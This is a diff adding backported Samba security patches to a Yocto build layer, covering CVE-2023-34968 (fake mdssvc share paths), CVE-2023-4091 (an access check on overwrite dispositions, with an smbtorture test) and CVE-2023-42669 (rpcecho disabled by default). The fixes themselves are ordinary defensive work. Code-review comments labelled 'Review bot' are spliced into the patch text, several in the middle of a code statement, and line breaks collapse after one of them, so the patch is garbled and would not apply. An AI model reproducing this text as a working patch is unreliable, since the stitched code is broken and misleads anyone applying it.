++ if (*p == '\0') {
++ DBG_DEBUG("Bad path: %s\n", path);
++ tevent_req_nterror(req, NT_STATUS_INVALID_PARAMETER);
++ return;
++ }
++
++ state->path = talloc_strdup(state, p);
++ if (state->path == NULL) {
++ tevent_req_nterror(req, NT_STATUS_NO_MEMORY);
++ return;
++ }
+ DBG_DEBUG("path: %s\n", state->path);
+
+ tevent_req_done(req);
+diff --git a/source3/rpc_client/cli_mdssvc_private.h b/source3/rpc_client/cli_mdssvc_private.h
+index 031af85..b10aca0 100644
+--- a/source3/rpc_client/cli_mdssvc_private.h
++++ b/source3/rpc_client/cli_mdssvc_private.h
+@@ -42,6 +42,7 @@ struct mdscli_ctx {
+ /* cmd specific or unknown fields */
+ struct {
+ char share_path[1025];
++ size_t share_path_len;
+ uint32_t unkn2;
+ uint32_t unkn3;
+ } mdscmd_open;
+@@ -56,6 +57,9 @@ struct mdscli_ctx {
+ struct {
+ uint32_t
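Review bot: `mdscli_get_path_done()` strips the prefix purely by length: it rejects `pathlen < prefixlen` and then sets `p = path + prefixlen` without comparing the skipped bytes with `path_scope` and `share_path`. `path` is unpacked from the server's reply, so a reply that does not carry the expected prefix yields a relative path cut at an arbitrary offset instead of an error. Compare both parts with `strncmp()` before stripping and fail with `NT_STATUS_INVALID_PARAMETER` on a mismatch, e.g. `if (strncmp(path, state->mdscli_ctx->path_scope, state->mdscli_ctx->path_scope_len) != 0) { ... }` followed by the same test for `mdscmd_open.share_path` at offset `path_scope_len`. The function starts outside the hunk.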
status; + } mdscmd_close; ++ ++ char *path_scope; ++ size_t path_scope_len; + }; + + struct mdscli_search_ctx { +diff --git a/source3/rpc_client/cli_mdssvc_util.c b/source3/rpc_client/cli_mdssvc_util.c +index a39202d..1eaaca7 100644 +--- a/source3/rpc_client/cli_mdssvc_util.c ++++ b/source3/rpc_client/cli_mdssvc_util.c +@@ -28,6 +28,74 @@ + #include "rpc_server/mdssvc/dalloc.h" + #include "rpc_server/mdssvc/marshalling.h" + ++NTSTATUS mdscli_blob_fetch_props(TALLOC_CTX *mem_ctx, ++ struct mdscli_ctx *ctx, ++ struct mdssvc_blob *blob) ++{ ++ DALLOC_CTX *d = NULL; ++ uint64_t *uint64p = NULL; ++ sl_array_t *array = NULL; ++ sl_array_t *cmd_array = NULL; ++ NTSTATUS status; ++ int ret; ++ ++ d = dalloc_new(mem_ctx); ++ if (d == NULL) { ++ return NT_STATUS_NO_MEMORY; ++ } ++ ++ array = dalloc_zero(d, sl_array_t); ++ if (array == NULL) { ++ TALLOC_FREE(d); ++ return NT_STATUS_NO_MEMORY; ++ } ++ ++ ret = dalloc_add(d, array, sl_array_t); ++ if (ret != 0) { ++ TALLOC_FREE(d); ++ return NT_STATUS_NO_MEMORY; ++ } ++ ++ cmd_array = dalloc_zero(d, sl_array_t); ++ if (cmd_array == NULL) { ++ TALLOC_FREE(d); ++ return NT_STATUS_NO_MEMORY; ++ } ++ ++ ret = dalloc_add(array, cmd_array, sl_array_t); ++ if (ret != 0) { ++ TALLOC_FREE(d); ++ return NT_STATUS_NO_MEMORY; ++ } ++ ++ ret = dalloc_stradd(cmd_array, "fetchPropertiesForContext:"); ++ if (ret != 0) { ++ TALLOC_FREE(d); ++ return NT_STATUS_NO_MEMORY; ++ } ++ ++ uint64p = talloc_zero_array(cmd_array, uint64_t, 2); ++ if (uint64p == NULL) { ++ TALLOC_FREE(d); ++ return NT_STATUS_NO_MEMORY; ++ } ++ ++ talloc_set_name(uint64p, "uint64_t *"); ++ ++ ret = dalloc_add(cmd_array, uint64p, uint64_t *); ++ if (ret != 0) { ++ TALLOC_FREE(d); ++ return NT_STATUS_NO_MEMORY; ++ } ++ ++ status = sl_pack_alloc(mem_ctx, d, blob, ctx->max_fragment_size); ++ TALLOC_FREE(d); ++ if (!NT_STATUS_IS_OK(status)) { ++ return status; ++ } ++ return NT_STATUS_OK; ++} ++ + NTSTATUS mdscli_blob_search(TALLOC_CTX *mem_ctx, + struct mdscli_search_ctx 
*search, + struct mdssvc_blob *blob) +diff --git a/source3/rpc_client/cli_mdssvc_util.h b/source3/rpc_client/cli_mdssvc_util.h +index 7a98c85..3f32475 100644 +--- a/source3/rpc_client/cli_mdssvc_util.h ++++ b/source3/rpc_client/cli_mdssvc_util.h +@@ -21,6 +21,10 @@ + #ifndef _MDSCLI_UTIL_H_ + #define _MDSCLI_UTIL_H_ + ++NTSTATUS mdscli_blob_fetch_props(TALLOC_CTX *mem_ctx, ++ struct mdscli_ctx *ctx, ++ struct mdssvc_blob *blob); ++ + NTSTATUS mdscli_blob_search(TALLOC_CTX *mem_ctx, + struct mdscli_search_ctx *search, + struct mdssvc_blob *blob); +-- +2.40.0 diff --git a/meta-networking/recipes-connectivity/samba/samba/CVE-2023-34968_0011.patch b/meta-networking/recipes-connectivity/samba/samba/CVE-2023-34968_0011.patch new file mode 100644 index 0000000000..d2bef187f7 --- /dev/null +++ b/meta-networking/recipes-connectivity/samba/samba/CVE-2023-34968_0011.patch 
@@ -0,0 +1,295 @@ +From 091b0265fe42878d676def5d4f5b4f8f3977b0e2 Mon Sep 17 00:00:00 2001 +From: Ralph Boehme <slow@samba.org> +Date: Mon, 5 Jun 2023 18:02:20 +0200 +Subject: [PATCH] CVE-2023-34968: mdssvc: return a fake share path Instead of + returning the real server-side absolute path of shares and search results, + return a fake absolute path replacing the path of the share with the share + name, iow for a share "test" with a server-side path of "/foo/bar", we + previously returned + + /foo/bar and + /foo/bar/search/result + +and now return + + /test and + /test/search/result + +BUG: https://bugzilla.samba.org/show_bug.cgi?id=15388 + +Signed-off-by: Ralph Boehme <slow@samba.org> +Reviewed-by: Stefan Metzmacher <metze@samba.org> + +Upstream-Status: Backport [https://github.com/samba-team/samba/commit/091b0265fe42878d676def5d4f5b4f8f3977b0e2] + +CVE: CVE-2023-34968 + +Signed-off-by: Archana Polampalli <archana.polampalli@windriver.com> +--- + source3/lib/util_path.c | 52 ++++++++++++++++++++ + source3/lib/util_path.h | 5 ++ + source3/rpc_server/mdssvc/mdssvc.c | 60 +++++++++++++++++++++-- + source3/rpc_server/mdssvc/mdssvc.h | 1 + + source3/rpc_server/mdssvc/srv_mdssvc_nt.c | 17 +++++-- + 6 files changed, 128 insertions(+), 7 deletions(-) + mode change 100755 => 100644 source3/libads/ldap.c + +diff --git a/source3/lib/util_path.c b/source3/lib/util_path.c +index c34b734..5b5a51c 100644 +--- a/source3/lib/util_path.c ++++ b/source3/lib/util_path.c +@@ -21,8 +21,10 @@ + * along with this program. If not, see <http://www.gnu.org/licenses/>. + */ + ++#include "includes.h" + #include "replace.h" + #include <talloc.h> ++#include "lib/util/debug.h" + #include "lib/util/samba_util.h" + #include "lib/util_path.h" + +@@ -210,3 +212,53 @@ char *canonicalize_absolute_path(TALLOC_CTX *ctx, const char *pathname_in) + *p++ = '\0'; + return pathname; + } ++ ++/* ++ * Take two absolute paths, figure out if "subdir" is a proper ++ * subdirectory of "parent". 
Return the component relative to the
++ * "parent" without the potential "/". Take care of "parent"
++ * possibly ending in "/".
++ */
++bool subdir_of(const char *parent,
++ size_t parent_len,
++ const char *subdir,
++ const char **_relative)
++{
++ const char *relative = NULL;
++ bool matched;
++
++ SMB_ASSERT(parent[0] == '/');
++ SMB_ASSERT(subdir[0] == '/');
++
++ if (parent_len == 1) {
++ /*
++ * Everything is below "/"
++ */
++ *_relative = subdir+1;
++ return true;
++ }
++
++ if (parent[parent_len-1] == '/') {
++ parent_len -= 1;
++ }
++
++ matched = (strncmp(subdir, parent, parent_len) == 0);
++ if (!matched) {
++ return false;
++ }
++
++ relative = &subdir[parent_len];
++
++ if (relative[0] == '\0') {
++ *_relative = relative; /* nothing left */
++ return true;
++ }
++
++ if (relative[0] == '/') {
++ /* End of parent must match a '/' in subdir. */
++ *_relative = relative+1;
++ return true;
++ }
++
++ return false;
++}
+diff --git a/source3/lib/util_path.h b/source3/lib/util_path.h
+index 3e7d04d..6d2155a 100644
+--- a/source3/lib/util_path.h
++++ b/source3/lib/util_path.h
+@@ -31,5 +31,10 @@ char *lock_path(TALLOC_CTX *mem_ctx, const char *name);
+ char *state_path(TALLOC_CTX *mem_ctx, const char *name);
+ char *cache_path(TALLOC_CTX *mem_ctx, const char *name);
+ char *canonicalize_absolute_path(TALLOC_CTX *ctx, const char *abs_path);
++bool subdir_of(const char *parent,
++ size_t parent_len,
++ const char *subdir,
++ const char **_relative);
++
+
+ #endif
+diff --git a/source3/rpc_server/mdssvc/mdssvc.c b/source3/rpc_server/mdssvc/mdssvc.c
+index 19257e8..d442d8d 100644
+--- a/source3/rpc_server/mdssvc/mdssvc.c
++++ b/source3/rpc_server/mdssvc/mdssvc.c
+@@ -520,11 +520,14 @@ static bool inode_map_add(struct sl_query *slq,
+ bool mds_add_result(struct sl_query *slq, const char *path)
+ {
+ struct smb_filename *smb_fname = NULL;
++ char *fake_path = NULL;
++ const char *relative = NULL;
+ struct stat_ex sb;
+ uint32_t attr;
+ uint64_t ino64;
+ int
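Review bot: `subdir_of()` takes `parent_len` on trust: with `parent_len == 0` the index in `parent[parent_len-1] == '/'` wraps and reads outside `parent`, and the following `strncmp()` over zero bytes then matches every `subdir`. The only caller in this patch passes `slq->mds_ctx->spath_len`, a field the mdssvc.h hunk adds but none of the visible hunks assigns, so confirm it is set wherever `spath` is. A guard such as `if (parent_len == 0) { return false; }` after the asserts keeps the containment check fail-closed. Both `SMB_ASSERT()` calls also apply to the `path` handed to `mds_add_result()`; if that string can arrive from the search backend unvalidated, returning false would be safer than aborting the process.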
result; + NTSTATUS status; ++ bool sub; + bool ok; + + /* +@@ -610,6 +613,17 @@ bool mds_add_result(struct sl_query *slq, const char *path) + } + } + ++ sub = subdir_of(slq->mds_ctx->spath, ++ slq->mds_ctx->spath_len, ++ path, ++ &relative); ++ if (!sub) { ++ DBG_ERR("[%s] is not inside [%s]\n", ++ path, slq->mds_ctx->spath); ++ slq->state = SLQ_STATE_ERROR; ++ return false; ++ } ++ + /* + * Add inode number and filemeta to result set, this is what + * we return as part of the result set of a query +@@ -622,18 +636,30 @@ bool mds_add_result(struct sl_query *slq, const char *path) + slq->state = SLQ_STATE_ERROR; + return false; + } ++ ++ fake_path = talloc_asprintf(slq, ++ "/%s/%s", ++ slq->mds_ctx->sharename, ++ relative); ++ if (fake_path == NULL) { ++ slq->state = SLQ_STATE_ERROR; ++ return false; ++ } ++ + ok = add_filemeta(slq->mds_ctx, + slq->reqinfo, + slq->query_results->fm_array, +- path, ++ fake_path, + &sb); + if (!ok) { + DBG_ERR("add_filemeta error\n"); ++ TALLOC_FREE(fake_path); + slq->state = SLQ_STATE_ERROR; + return false; + } + +- ok = inode_map_add(slq, ino64, path, &sb); ++ ok = inode_map_add(slq, ino64, fake_path, &sb); ++ TALLOC_FREE(fake_path); + if (!ok) { + DEBUG(1, ("inode_map_add error\n")); + slq->state = SLQ_STATE_ERROR; +@@ -840,6 +866,32 @@ static void slq_close_timer(struct tevent_context *ev, + } + } + ++/** ++ * Translate a fake scope from the client like /sharename/dir ++ * to the real server-side path, replacing the "/sharename" part ++ * with the absolute server-side path of the share. 
++ **/
++static bool mdssvc_real_scope(struct sl_query *slq, const char *fake_scope)
++{
++ size_t sname_len = strlen(slq->mds_ctx->sharename);
++ size_t fake_scope_len = strlen(fake_scope);
++
++ if (fake_scope_len < sname_len + 1) {
++ DBG_ERR("Short scope [%s] for share [%s]\n",
++ fake_scope, slq->mds_ctx->sharename);
++ return false;
++ }
++
++ slq->path_scope = talloc_asprintf(slq,
++ "%s%s",
++ slq->mds_ctx->spath,
++ fake_scope + sname_len + 1);
++ if (slq->path_scope == NULL) {
++ return false;
++ }
++ return true;
++}
++
+ /**
+ * Begin a search query
+ **/
+@@ -946,8 +998,8 @@ static bool slrpc_open_query(struct mds_ctx *mds_ctx,
+ goto error;
+ }
+
+- slq->path_scope = talloc_strdup(slq, scope);
+- if (slq->path_scope == NULL) {
++ ok = mdssvc_real_scope(slq, scope);
++ if (!ok) {
+ goto error;
+ }
+
+diff --git a/source3/rpc_server/mdssvc/mdssvc.h b/source3/rpc_server/mdssvc/mdssvc.h
+index b3bd8b9..8434812 100644
+--- a/source3/rpc_server/mdssvc/mdssvc.h
++++ b/source3/rpc_server/mdssvc/mdssvc.h
+@@ -127,6 +127,7 @@ struct mds_ctx {
+ int snum;
+ const char *sharename;
+ const char *spath;
++ size_t spath_len;
+ struct connection_struct *conn;
+ struct sl_query *query_list; /* list of active queries */
+ struct db_context *ino_path_map; /* dbwrap rbt for storing inode->path mappings */
+diff --git a/source3/rpc_server/mdssvc/srv_mdssvc_nt.c b/source3/rpc_server/mdssvc/srv_mdssvc_nt.c
+index 59e2a97..b20bd2a 100644
+--- a/source3/rpc_server/mdssvc/srv_mdssvc_nt.c
++++ b/source3/rpc_server/mdssvc/srv_mdssvc_nt.c
+@@ -121,6 +121,7 @@ void _mdssvc_open(struct pipes_struct *p, struct mdssvc_open *r)
+ loadparm_s3_global_substitution();
+ int snum;
+ char *outpath = discard_const_p(char, r->out.share_path);
++ char *fake_path = NULL;
+ char *path;
+ NTSTATUS status;
+
+@@ -144,21 +145,31 @@ void _mdssvc_open(struct pipes_struct *p, struct mdssvc_open *r)
+ return;
+ }
+
++ fake_path = talloc_asprintf(p->mem_ctx, "/%s", r->in.share_name);
++ if (fake_path ==
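Review bot: `mdssvc_real_scope()` validates the client-supplied scope by length only: it tests `fake_scope_len < sname_len + 1`, but never compares the first `sname_len + 1` bytes with "/" followed by the share name, and whatever follows is appended to `spath` unchanged. A scope with a different prefix of the same length, or a remainder that climbs out with `..`, therefore gives a `path_scope` that is not under the share root; results are filtered later by `subdir_of()` in `mds_add_result()`, but the backend query would presumably still run with that scope. Check the prefix before building the path, e.g. `if (fake_scope[0] != '/' || strncmp(fake_scope + 1, slq->mds_ctx->sharename, sname_len) != 0) { return false; }`, and require the character after it to be `'/'` or the terminator.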
NULL) {
++ DBG_ERR("Couldn't create fake share path for %s\n",
++ r->in.share_name);
++ talloc_free(path);
++ p->fault_state = DCERPC_FAULT_CANT_PERFORM;
++ return;
++ }
++
+ status = create_mdssvc_policy_handle(p->mem_ctx, p,
+ snum,
+ r->in.share_name,
+ path,
+ r->out.handle);
+ if (!NT_STATUS_IS_OK(status)) {
+- DBG_ERR("Couldn't create policy handle for %s\n",
++ DBG_ERR("Couldn't create path for %s\n",
+ r->in.share_name);
+ talloc_free(path);
++ talloc_free(fake_path);
+ p->fault_state = DCERPC_FAULT_CANT_PERFORM;
+ return;
+ }
+
+- strlcpy(outpath, path, 1024);
+- talloc_free(path);
++ strlcpy(outpath, fake_path, 1024);
++ talloc_free(fake_path);
+ return;
+ }
+
+--
+2.40.0
diff --git a/meta-networking/recipes-connectivity/samba/samba/CVE-2023-4091-0001.patch b/meta-networking/recipes-connectivity/samba/samba/CVE-2023-4091-0001.patch
new file mode 100644
index 0000000000..908ab85baf
--- /dev/null
+++ b/meta-networking/recipes-connectivity/samba/samba/CVE-2023-4091-0001.patch
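Review bot: In `_mdssvc_open()` the log text for a failed `create_mdssvc_policy_handle()` changes from "Couldn't create policy handle" to "Couldn't create path", which no longer names the step that failed and is easy to confuse with the new `fake_path` error just above it; keep `DBG_ERR("Couldn't create policy handle for %s\n",`. On the success path `talloc_free(path)` is replaced by `talloc_free(fake_path)`, so `path` is no longer released there; whether that matters depends on the context it was allocated from, which is outside the hunk. The function starts outside the hunk.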
@@ -0,0 +1,193 @@
+From b08a60160e6ab8d982d31844bcbf7ab67ff3a8de Mon Sep 17 00:00:00 2001
+From: Ralph Boehme <slow@samba.org>
+Date: Tue, 1 Aug 2023 12:30:00 +0200
+Subject: [PATCH 2/2] CVE-2023-4091: smbtorture: test overwrite dispositions on
+ read-only file
+
+BUG: https://bugzilla.samba.org/show_bug.cgi?id=15439
+
+Signed-off-by: Ralph Boehme <slow@samba.org>
+
+CVE: CVE-2023-4091
+
+Upstream-Status: Backport [https://github.com/samba-team/samba/commit/b08a60160e6ab8d982d31844bcbf7ab67ff3a8de]
+
+Signed-off-by: Archana Polampalli <archana.polampalli@windriver.com>
+---
+ selftest/knownfail.d/samba3.smb2.acls | 1 +
+ source4/torture/smb2/acls.c | 145 ++++++++++++++++++++++++++
+ 2 files changed, 146 insertions(+)
+ create mode 100644 selftest/knownfail.d/samba3.smb2.acls
+
+diff --git a/selftest/knownfail.d/samba3.smb2.acls b/selftest/knownfail.d/samba3.smb2.acls
+new file mode 100644
+index 0000000..18df260
+--- /dev/null
++++ b/selftest/knownfail.d/samba3.smb2.acls
+@@ -0,0 +1 @@
++^samba3.smb2.acls.OVERWRITE_READ_ONLY_FILE
+diff --git a/source4/torture/smb2/acls.c b/source4/torture/smb2/acls.c
+index 4f4538b..d26caeb 100644
+--- a/source4/torture/smb2/acls.c
++++ b/source4/torture/smb2/acls.c
+@@ -3023,6 +3023,149 @@ done:
+ return ret;
+ }
+
++static bool test_overwrite_read_only_file(struct torture_context *tctx,
++ struct smb2_tree *tree)
++{
++ NTSTATUS status;
++ struct smb2_create c;
++ const char *fname = BASEDIR "\\test_overwrite_read_only_file.txt";
++ struct smb2_handle handle = {{0}};
++ union smb_fileinfo q;
++ union smb_setfileinfo set;
++ struct security_descriptor *sd = NULL, *sd_orig = NULL;
++ const char *owner_sid = NULL;
++ int i;
++ bool ret = true;
++
++ struct tcase {
++ int disposition;
++ const char *disposition_string;
++ NTSTATUS expected_status;
++ } tcases[] = {
++#define TCASE(d, s) { \
++ .disposition = d, \
++ .disposition_string = #d, \
++ .expected_status = s, \
++ }
++ TCASE(NTCREATEX_DISP_OPEN, NT_STATUS_OK),
++ TCASE(NTCREATEX_DISP_SUPERSEDE, NT_STATUS_ACCESS_DENIED),
++ TCASE(NTCREATEX_DISP_OVERWRITE, NT_STATUS_ACCESS_DENIED),
++ TCASE(NTCREATEX_DISP_OVERWRITE_IF, NT_STATUS_ACCESS_DENIED),
++ };
++#undef TCASE
++
++ ret = smb2_util_setup_dir(tctx, tree, BASEDIR);
++ torture_assert_goto(tctx, ret, ret, done, "smb2_util_setup_dir not ok");
++
++ c = (struct smb2_create) {
++ .in.desired_access = SEC_STD_READ_CONTROL |
++ SEC_STD_WRITE_DAC |
++ SEC_STD_WRITE_OWNER,
++ .in.file_attributes = FILE_ATTRIBUTE_NORMAL,
++ .in.share_access = NTCREATEX_SHARE_ACCESS_READ |
++ NTCREATEX_SHARE_ACCESS_WRITE,
++ .in.create_disposition = NTCREATEX_DISP_OPEN_IF,
++ .in.impersonation_level = NTCREATEX_IMPERSONATION_ANONYMOUS,
++ .in.fname = fname,
++ };
++
++ status = smb2_create(tree, tctx, &c);
++ torture_assert_ntstatus_ok_goto(tctx, status, ret, done,
++ "smb2_create failed\n");
++ handle = c.out.file.handle;
++
++ torture_comment(tctx, "get the original sd\n");
++
++ ZERO_STRUCT(q);
++ q.query_secdesc.level = RAW_FILEINFO_SEC_DESC;
++ q.query_secdesc.in.file.handle = handle;
++ q.query_secdesc.in.secinfo_flags = SECINFO_DACL | SECINFO_OWNER;
++
++ status = smb2_getinfo_file(tree, tctx, &q);
++ torture_assert_ntstatus_ok_goto(tctx, status, ret, done,
++ "smb2_getinfo_file failed\n");
++ sd_orig = q.query_secdesc.out.sd;
++
++ owner_sid = dom_sid_string(tctx, sd_orig->owner_sid);
++
++ sd = security_descriptor_dacl_create(tctx,
++ 0, NULL, NULL,
++ owner_sid,
++ SEC_ACE_TYPE_ACCESS_ALLOWED,
++ SEC_FILE_READ_DATA,
++ 0,
++ NULL);
++
++ ZERO_STRUCT(set);
++ set.set_secdesc.level = RAW_SFILEINFO_SEC_DESC;
++ set.set_secdesc.in.file.handle = handle;
++ set.set_secdesc.in.secinfo_flags = SECINFO_DACL;
++ set.set_secdesc.in.sd = sd;
++
++ status = smb2_setinfo_file(tree, &set);
++ torture_assert_ntstatus_ok_goto(tctx, status, ret, done,
++ "smb2_setinfo_file failed\n");
++
++ smb2_util_close(tree, handle);
++ ZERO_STRUCT(handle);
++
++ for (i = 0; i < ARRAY_SIZE(tcases); i++) {
++ torture_comment(tctx, "Verify open with %s dispostion\n",
++ tcases[i].disposition_string);
++
++ c = (struct smb2_create) {
++ .in.create_disposition = tcases[i].disposition,
++ .in.desired_access = SEC_FILE_READ_DATA,
++ .in.file_attributes = FILE_ATTRIBUTE_NORMAL,
++ .in.share_access = NTCREATEX_SHARE_ACCESS_MASK,
++ .in.impersonation_level = NTCREATEX_IMPERSONATION_ANONYMOUS,
++ .in.fname = fname,
++ };
++
++ status = smb2_create(tree, tctx, &c);
++ smb2_util_close(tree, c.out.file.handle);
++ torture_assert_ntstatus_equal_goto(
++ tctx, status, tcases[i].expected_status, ret, done,
++ "smb2_create failed\n");
++ };
++
++ torture_comment(tctx, "put back original sd\n");
++
++ c = (struct smb2_create) {
++ .in.desired_access = SEC_STD_WRITE_DAC,
++ .in.file_attributes = FILE_ATTRIBUTE_NORMAL,
++ .in.share_access = NTCREATEX_SHARE_ACCESS_MASK,
++ .in.create_disposition = NTCREATEX_DISP_OPEN_IF,
++ .in.impersonation_level = NTCREATEX_IMPERSONATION_ANONYMOUS,
++ .in.fname = fname,
++ };
++
++ status = smb2_create(tree, tctx, &c);
++ torture_assert_ntstatus_ok_goto(tctx, status, ret, done,
++ "smb2_create failed\n");
++ handle = c.out.file.handle;
++
++ ZERO_STRUCT(set);
++ set.set_secdesc.level = RAW_SFILEINFO_SEC_DESC;
++ set.set_secdesc.in.file.handle = handle;
++ set.set_secdesc.in.secinfo_flags = SECINFO_DACL;
++ set.set_secdesc.in.sd = sd_orig;
++
++ status = smb2_setinfo_file(tree, &set);
++ torture_assert_ntstatus_ok_goto(tctx, status, ret, done,
++ "smb2_setinfo_file failed\n");
++
++ smb2_util_close(tree, handle);
++ ZERO_STRUCT(handle);
++
++done:
++ smb2_util_close(tree, handle);
++ smb2_util_unlink(tree, fname);
++ smb2_deltree(tree, BASEDIR);
++ return ret;
++}
++
++
+ /*
+ basic testing of SMB2 ACLs
+ */
+@@ -3051,6 +3194,8 @@ struct torture_suite *torture_smb2_acls_init(TALLOC_CTX *ctx)
+ test_deny1);
+ torture_suite_add_1smb2_test(suite, "MXAC-NOT-GRANTED",
+ test_mxac_not_granted);
++ torture_suite_add_1smb2_test(suite, "OVERWRITE_READ_ONLY_FILE",
++ test_overwrite_read_only_file);
+
+ suite->description = talloc_strdup(suite, "SMB2-ACLS tests");
+
+--
+2.40.0
diff --git a/meta-networking/recipes-connectivity/samba/samba/CVE-2023-4091-0002.patch b/meta-networking/recipes-connectivity/samba/samba/CVE-2023-4091-0002.patch
new file mode 100644
index 0000000000..43d3b4929f
--- /dev/null
+++ b/meta-networking/recipes-connectivity/samba/samba/CVE-2023-4091-0002.patch
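Review bot: In the disposition loop of test_overwrite_read_only_file(), `smb2_util_close(tree, c.out.file.handle);` runs before the status is compared, so for the three cases that expect NT_STATUS_ACCESS_DENIED it closes a handle the create did not hand back (presumably the zeroed one from the compound literal). Guarding it, `if (NT_STATUS_IS_OK(status)) { smb2_util_close(tree, c.out.file.handle); }`, keeps the close from being sent for a failed create. If an assertion jumps to `done` after the DACL has been reduced to SEC_FILE_READ_DATA, the original descriptor is not put back before the unlink; whether cleanup still succeeds in that state is not visible here. The comment string also reads `dispostion` for `disposition`.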
@@ -0,0 +1,59 @@
+From 8b26f634372f11edcbea33dfd68a3d57889dfcc5 Mon Sep 17 00:00:00 2001
+From: Ralph Boehme <slow@samba.org>
+Date: Tue, 1 Aug 2023 13:04:36 +0200
+Subject: [PATCH] CVE-2023-4091: smbd: use open_access_mask for access check in
+ open_file()
+
+If the client requested FILE_OVERWRITE[_IF], we're implicitly adding
+FILE_WRITE_DATA to the open_access_mask in open_file_ntcreate(), but for the
+access check we're using access_mask which doesn't contain the additional
+right, which means we can end up truncating a file for which the user has
+only read-only access via an SD.
+
+BUG: https://bugzilla.samba.org/show_bug.cgi?id=15439
+
+Signed-off-by: Ralph Boehme <slow@samba.org>
+
+CVE: CVE-2023-4091
+
+Upstream-Status: Backport [https://github.com/samba-team/samba/commit/8b26f634372f11edcbea33dfd68a3d57889dfcc5]
+
+Signed-off-by: Archana Polampalli <archana.polampalli@windriver.com>
+---
+ selftest/knownfail.d/samba3.smb2.acls | 1 -
+ source3/smbd/open.c | 4 ++--
+ 2 files changed, 2 insertions(+), 3 deletions(-)
+ delete mode 100644 selftest/knownfail.d/samba3.smb2.acls
+
+diff --git a/selftest/knownfail.d/samba3.smb2.acls b/selftest/knownfail.d/samba3.smb2.acls
+deleted file mode 100644
+index 18df260..0000000
+--- a/selftest/knownfail.d/samba3.smb2.acls
++++ /dev/null
+@@ -1 +0,0 @@
+-^samba3.smb2.acls.OVERWRITE_READ_ONLY_FILE
+diff --git a/source3/smbd/open.c b/source3/smbd/open.c
+index 2c3bf9e..4bec5cb 100644
+--- a/source3/smbd/open.c
++++ b/source3/smbd/open.c
+@@ -1402,7 +1402,7 @@ static NTSTATUS open_file(files_struct *fsp,
+ conn->cwd_fsp,
+ smb_fname,
+ false,
+- access_mask);
++ open_access_mask);
+
+ if (!NT_STATUS_IS_OK(status)) {
+ DEBUG(10, ("open_file: "
+@@ -1585,7 +1585,7 @@ static NTSTATUS open_file(files_struct *fsp,
+ conn->cwd_fsp,
+ smb_fname,
+ false,
+- access_mask);
++ open_access_mask);
+
+ if (NT_STATUS_EQUAL(status, NT_STATUS_OBJECT_NAME_NOT_FOUND) &&
+ (fsp->posix_flags & FSP_POSIX_FLAGS_OPEN) &&
+--
+2.40.0
+
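Review bot: Neither changed call site in open_file() says why the check now takes `open_access_mask`, so a later cleanup could switch it back to `access_mask` without noticing the difference. A comment above each call would record it, for example `/* Check open_access_mask: overwrite dispositions implicitly add FILE_WRITE_DATA, which access_mask lacks. */`. Both inner hunks show only the tail of the call, and open_file() starts and ends outside them, so any other access check in that function that still uses `access_mask` cannot be ruled out from here.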
diff --git a/meta-networking/recipes-connectivity/samba/samba/CVE-2023-42669.patch b/meta-networking/recipes-connectivity/samba/samba/CVE-2023-42669.patch
new file mode 100644
index 0000000000..dfa6aeb023
--- /dev/null
+++ b/meta-networking/recipes-connectivity/samba/samba/CVE-2023-42669.patch
@@ -0,0 +1,94 @@
+From 9989568b20c8f804140c22f51548d766a18ed887 Mon Sep 17 00:00:00 2001
+From: Andrew Bartlett <abartlet@samba.org>
+Date: Tue, 12 Sep 2023 18:59:44 +1200
+Subject: [PATCH] CVE-2023-42669 s4-rpc_server: Disable rpcecho server by
+ default
+
+The rpcecho server is useful in development and testing, but should never
+have been allowed into production, as it includes the facility to
+do a blocking sleep() in the single-threaded rpc worker.
+
+BUG: https://bugzilla.samba.org/show_bug.cgi?id=15474
+
+Signed-off-by: Andrew Bartlett <abartlet@samba.org>
+
+CVE: CVE-2023-42669
+
+Upstream-Status: Backport [https://github.com/samba-team/samba/commit/9989568b20c8f804140c22f51548d766a18ed887]
+
+Signed-off-by: Archana Polampalli <archana.polampalli@windriver.com>
+---
+ docs-xml/smbdotconf/protocol/dcerpcendpointservers.xml | 2 +-
+ lib/param/loadparm.c | 2 +-
+ selftest/target/Samba4.pm | 2 +-
+ source3/param/loadparm.c | 2 +-
+ source4/rpc_server/wscript_build | 3 ++-
+ 5 files changed, 6 insertions(+), 5 deletions(-)
+
+diff --git a/docs-xml/smbdotconf/protocol/dcerpcendpointservers.xml b/docs-xml/smbdotconf/protocol/dcerpcendpointservers.xml
+index 8a217cc..c6642b7 100644
+--- a/docs-xml/smbdotconf/protocol/dcerpcendpointservers.xml
++++ b/docs-xml/smbdotconf/protocol/dcerpcendpointservers.xml
+@@ -6,6 +6,6 @@
+ <para>Specifies which DCE/RPC endpoint servers should be run.</para>
+ </description>
+
+-<value type="default">epmapper, wkssvc, rpcecho, samr, netlogon, lsarpc, drsuapi, dssetup, unixinfo, browser, eventlog6, backupkey, dnsserver</value>
++<value type="default">epmapper, wkssvc, samr, netlogon, lsarpc, drsuapi, dssetup, unixinfo, browser, eventlog6, backupkey, dnsserver</value>
+ <value type="example">rpcecho</value>
+ </samba:parameter>
+diff --git a/lib/param/loadparm.c b/lib/param/loadparm.c
+index eedfa00..75687f5 100644
+--- a/lib/param/loadparm.c
++++ b/lib/param/loadparm.c
+@@ -2717,7 +2717,7 @@ struct loadparm_context *loadparm_init(TALLOC_CTX *mem_ctx)
+ lpcfg_do_global_parameter(lp_ctx, "ntvfs handler", "unixuid default");
+ lpcfg_do_global_parameter(lp_ctx, "max connections", "0");
+
+- lpcfg_do_global_parameter(lp_ctx, "dcerpc endpoint servers", "epmapper wkssvc rpcecho samr netlogon lsarpc drsuapi dssetup unixinfo browser eventlog6 backupkey dnsserver");
++ lpcfg_do_global_parameter(lp_ctx, "dcerpc endpoint servers", "epmapper wkssvc samr netlogon lsarpc drsuapi dssetup unixinfo browser eventlog6 backupkey dnsserver");
+ lpcfg_do_global_parameter(lp_ctx, "server services", "s3fs rpc nbt wrepl ldap cldap kdc drepl winbindd ntp_signd kcc dnsupdate dns");
+ lpcfg_do_global_parameter(lp_ctx, "kccsrv:samba_kcc", "true");
+ /* the winbind method for domain controllers is for both RODC
+diff --git a/selftest/target/Samba4.pm b/selftest/target/Samba4.pm
+index 651faa7..c7b33d2 100755
+--- a/selftest/target/Samba4.pm
++++ b/selftest/target/Samba4.pm
+@@ -773,7 +773,7 @@ sub provision_raw_step1($$)
+ wins support = yes
+ server role = $ctx->{server_role}
+ server services = +echo $services
+- dcerpc endpoint servers = +winreg +srvsvc
++ dcerpc endpoint servers = +winreg +srvsvc +rpcecho
+ notify:inotify = false
+ ldb:nosync = true
+ ldap server require strong auth = yes
+diff --git a/source3/param/loadparm.c b/source3/param/loadparm.c
+index 8bcd35f..a99ab35 100644
